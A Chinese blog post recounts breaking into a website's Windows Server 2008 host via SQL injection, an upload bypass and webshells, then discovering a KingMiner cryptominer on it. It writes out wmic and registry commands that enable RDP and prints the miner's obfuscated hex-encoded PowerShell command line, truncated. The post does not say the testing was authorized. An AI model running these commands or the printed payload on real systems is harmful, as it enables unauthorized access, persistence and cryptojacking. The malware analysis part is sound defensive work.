挖洞奇遇
最近一直感觉很忙,但是也没做什么大事,白天就是整理一些文档之类的琐碎小事。
晚上就是回家刷会剧,然后刷几个漏洞就到凌晨1 2点了
其实这篇文章好久之前就像发的,本来想追求完美,但是就是最后一个环节,一直没彻底研究清楚,想了想,还是先发了吧。
懒得排版了,反正也没几个人看。
正文:
最近几天想刷几个洞,在一个站扫目录的时候,扫到了一个shell.php的PHP文件,用连接工具连了一下,试了几个密码都不对。这网站肯定是有洞的。随便点开一个页面加了个点,报错了,有注入。
先把后台密码跑出来,进后台看看
MD5解密,这里吐槽一下,CMD5要收费,但在Somd5,直接就出来了
很简约的后台界面,随便找了一个上传点,只有一个简单的前端验证,抓包改了一下后缀就直接传上去了。
冰蝎马直接连接上了
连上的第一个命令肯定是whoami啦,system………
还是我平常的喜欢,cs powshell上线。
但是等了好久,执行了 2 3次 cs这边都没有上线
莫非是有杀毒?查看了一下进程,并没有看到有杀毒软件。然后又试了几次,换了几个免杀的powshell,也还是不行。
脑子里闪过一个可笑的想法,不会是xp系统吧?没有powshell?
因为之前确实碰到过一个私服的宣传页就是一个xp系统。当时就是powshell怎么执行也不行,后来看了一下居然是xp
但是这个不是XP,Systeminfo看了一下 windows sever 2008
算了,既然不让我用我喜欢的方式进去,那我就换个姿势吧,传个大马试一下吧,直接运行大马
进去了~上线了,system权限的马,直接读密码
读出密码来,直接远程连接了,但是在我的意向之中,因为之前在看有没有杀毒软件查进程的时候,看到了一个Teamviewer的进程,我猜可能就是管理员不用远程连接登服务器,而是用这种软件来管理。
看了一下,3389确实没有开
开启3389的方式,也是之前在tools上看的,就收藏下来了
win08,三条命令即可:
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
win2012通用;win7前两条即可。权限需要run as administrator。
win03 winxp 一条命令即可:
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
以上前提条件是确保Windows Management Instrumentation(Winmgmt)服务已正常启动,权限的话貌似(没有详细测试)需要administrator及以上
再看一下3389 已经开启了
登录成功,但是巨TM卡,幻灯片一样,终于知道为什么我的powshell上不了线了
在任务管理器里面,找到了一个windowsUpdate的进程,其实就是一个powshell
看他的powshell是个加密的,想把他的powshell 命令弄出来,看看能不能分析一波
各种ctrl加右键复制,都白搭,复制不出来
通过各种查各种搜,又学到了一招
在windows下查看某个运行程序(或进程)的命令行参数
使用下面的命令:
wmic process get caption,commandline /value
如果想查询某一个进程的命令行参数,使用下列方式:
wmic process where caption=”xxx.exe” get caption,commandline /value
这样就可以得到进程的可执行文件位置等信息。
直接复制出来,本来想找个人直接给解一下,但是都说加密太麻烦。
还有一直方法虽然不知道他执行的命令,但是可以查到powshell连接的ip
通过pid查看连接
微步查了一下
本来打算就这样结束了,但是总感觉不对,一个powshell为什么会占用了100%的内存,总感觉这个powshell不只是为了做权限维持这么简单
看了一下他所在的目录
每个文件夹里面都有一个,而且在19年的文件夹里面,发现了几个可疑的文件
好熟悉的名字,仔细想了想,好像是去年在北京做日志分析的时候专门研究过这个东西,就是一个挖矿。
参考文章:http://www.minersight.com/2019/11/27/13517.html
数字签名为广州酷狗
Dll文件放微步检测了一下
alger.exe为微软系统文件credwiz.exed,功能描述为Credential Backup and Restore Wizard(凭据备份和还原向导),该程序在启动后自动加载系统DLL文件duer.dll并调用其导出函数InitGadgets()。
除了微软系统文件外,KingMiner在挖矿木马的“白+黑”启动过程中还利用了多个知名公司的含数字签名的文件来逃避杀软检测,利用正常的有数字签名的白文件来调用恶意dll。
目前发现的包括以下数字签名的文件被利用:
“GuangZhou KuGou Computer Technology Co.,Ltd.”
“Google Inc”
“福建创意嘉和软件有限公司”
32a1.zip/64a1.zip解压后在同一目录下释放受信任的系统文件alger.exe(credwiz.exed)和恶意的 duer.dll,利用alger.exe加载duer.dll并调用其导出的InitGadgets(),从而在InitGadgets()中解密保存 在同目录下的x.txt或x/y/z.png中的XMRig挖矿程序代码,并启动门罗币挖矿过程。
这个服务器上的挖矿代码是config.json
打开config.json就是他的挖矿程序代码
但是到现在,我还不确定这个powshell到底做了什么,因为是加密的,而且对shell脚本不是很熟悉,如果有对shell命令比较熟悉的,可以试着解一下。
Caption=WindowsUpdate.exe
CommandLine="C:\Users\Public\20205710714\WindowsUpdate.exe" -c "$p='38733C213C52796B31537E76797F683C315F7371537E76797F683C516F6471702E324451505448484C273872757F213B7468686C2633333B37345B796831587D68793C315A736E717D683C3B54716F3B35373B323B3734477F73726A796E6841262648735572682F2E34345B796831587D68793C
315A736E717D683C3B65513B353747717D68744126267A7073736E34345B796831587D68793C315A736E717D683C3B78783B35332F2E3537345B796831587D68793C315A736E717D683C3B65653B35302D2C35353248734F686E75727B343B643B35373B7A787D79327F7371333B27387332536C7972343B5B59483B303872757F373B727F326864683B303C385A7D706F7935273873
324F797278343527386C213873326E796F6C73726F794879646827474F656F68797132487964683259727F737875727B4126265D6F7F7575325B79684F686E75727B34475F73726A796E684126265A6E73715E7D6F792A284F686E75727B34386C3535603A345B5D503C5536443527717D75723C314D71586A51594E4825253C3872757F3C317175727B3C787D78326864683C314C4E
544A735F6D462525';$p=for($i=0; $i -lt $p.length; $i+= 2){[char](([byte][char][int]::Parse($p.substring($i,2),'HexNumber')) 到这里就结束了。
Bye